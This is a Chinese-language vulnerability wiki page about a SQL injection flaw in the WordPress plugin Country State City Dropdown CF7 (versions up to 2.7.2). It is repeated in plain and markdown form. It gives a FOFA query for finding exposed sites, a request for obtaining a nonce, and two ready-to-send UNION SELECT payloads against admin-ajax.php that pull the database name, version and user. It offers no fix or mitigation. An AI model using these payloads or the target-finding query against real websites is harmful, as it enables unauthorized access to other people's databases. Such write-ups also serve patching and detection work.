fofamini-wiki

登录白背景

源码

WordPress CF7插件cities存在SQL注入漏洞

一、漏洞简介

wordpress是一种自由和开放源代码的内容管理系统，基于php和mysql，使用wordpress，用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序，而无需深入了解编程语言或数据库管理。WordPress CF7插件cities存在SQL注入漏洞

二、影响版本

Country State City Dropdown CF7 <= 2.7.2

三、资产测绘

fofabody="/wp-content/plugins/country-state-city-auto-dropdown/"
特征

四、漏洞复现

首先通过poc获取nonce值

GET / HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

使用nonce值进行SQL注入测试

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
action=tc_csca_get_states&nonce_ajax=f662a5f7d7&cnt=1+or+0+union+select+concat%280x64617461626173653a%2Cdatabase%28%29%2C0x7c76657273696f6e3a%2Cversion%28%29%2C0x7c757365723a%2Cuser%28%29%29%2C2%2C3--+-

POC2：

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
action=tc_csca_get_cities&nonce_ajax=f662a5f7d7&sid=1+or+0+union+select+concat%280x64617461626173653a%2Cdatabase%28%29%2C0x7c76657273696f6e3a%2Cversion%28%29%2C0x7c757365723a%2Cuser%28%29%29%2C2%2C3--+-

原文: https://www.yuque.com/xiaokp7/ocvun2/dqowf4294614h3os

# WordPress CF7插件cities存在SQL注入漏洞

# 一、漏洞简介
wordpress是一种自由和开放源代码的内容管理系统，基于php和mysql，使用wordpress，用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序，而无需深入了解编程语言或数据库管理。WordPress CF7插件cities存在SQL注入漏洞

# 二、影响版本
+ Country State City Dropdown CF7 <= 2.7.2

# 三、资产测绘
+ fofa`body="/wp-content/plugins/country-state-city-auto-dropdown/"`
+ 特征

![1716814370160-8f81d79d-f2bf-4fad-b39d-cc0a6c8b7eec.png](./img/RtkVOD-Suh6G6Nfp/1716814370160-8f81d79d-f2bf-4fad-b39d-cc0a6c8b7eec-763694.png)

# 四、漏洞复现
首先通过poc获取nonce值

```plain
GET / HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```

![1716814464399-33a08ef5-6a1f-475a-b39e-28e92b14ed5f.png](./img/RtkVOD-Suh6G6Nfp/1716814464399-33a08ef5-6a1f-475a-b39e-28e92b14ed5f-167540.png)

使用nonce值进行SQL注入 测试

```plain
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
action=tc_csca_get_states&nonce_ajax=f662a5f7d7&cnt=1+or+0+union+select+concat%280x64617461626173653a%2Cdatabase%28%29%2C0x7c76657273696f6e3a%2Cversion%28%29%2C0x7c757365723a%2Cuser%28%29%29%2C2%2C3--+-
```

![1716814514719-976b42e3-f953-4105-8903-e64a815ee268.png](./img/RtkVOD-Suh6G6Nfp/1716814514719-976b42e3-f953-4105-8903-e64a815ee268-208738.png)

POC2：

```plain
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
action=tc_csca_get_cities&nonce_ajax=f662a5f7d7&sid=1+or+0+union+select+concat%280x64617461626173653a%2Cdatabase%28%29%2C0x7c76657273696f6e3a%2Cversion%28%29%2C0x7c757365723a%2Cuser%28%29%29%2C2%2C3--+-
```

![1716814678335-4dc9e5e5-108c-4de9-90b3-b11289cbb931.png](./img/RtkVOD-Suh6G6Nfp/1716814678335-4dc9e5e5-108c-4de9-90b3-b11289cbb931-530297.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dqowf4294614h3os>

fofamini-wiki

WordPress CF7插件cities存在SQL注入漏洞

<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>

<font style="color:rgb(38, 38, 38);">二、影响版本</font>

<font style="color:rgb(38, 38, 38);">三、资产测绘</font>

四、漏洞复现